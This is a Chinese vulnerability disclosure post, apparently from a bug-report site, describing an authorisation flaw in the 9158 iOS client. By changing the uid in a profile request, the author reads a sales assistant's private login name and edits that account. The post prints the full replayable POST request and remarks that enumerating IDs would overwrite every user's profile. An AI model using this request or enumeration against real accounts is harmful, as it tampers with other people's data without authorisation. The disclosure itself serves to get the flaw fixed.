|
天格科技某处越权漏洞可修改任意账户资料 问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。 下载方式位于http://mobile.9158.com/ 或直接91助手搜索9158 进入客户端,注册帐号。我们点击个人资料
我们看下数据包
发现了用户ID的参数,而在首页,我发现了9158公司VIP销售助理的ID
我们把ID改为30400试试
可以看到,成功读取了该销售助理的信息,包括不对外公开的登录用户名 那么我们继续尝试更改信息,点击保存
POST /user/updateInfo_new.aspx? HTTP/1.1 Host: mobile.9158.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Accept-Language: zh-cn Accept: */* Pragma: no-cache Content-Length: 827 Connection: keep-alive User-Agent: ChatRoom/1.0.7 CFNetwork/609.1.4 Darwin/13.0.0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="uid" 30400 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="secret" d37ab3012c38a3ad1b96e90dffc1d0cc --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="city" o??Y --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="name" VIP?úê??úàí --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="gender" 0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="birthday" 19910101 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="province" ???- --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw 我把用户名加了个句号,发现成功更改掉了。
gender是性别,默认不可更改,但是通过改数据可以实现,0为女,1为男。 至于uid不用解释了吧。 如果我把ID遍历一遍,那么全站的用户信息都会被改掉了。 修复方案:添加接口认证 |
-
上一篇: 微信某示例代码函数使用不当可能会导致第三方
下一篇: Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤) - 网
还没有人抢沙发呢~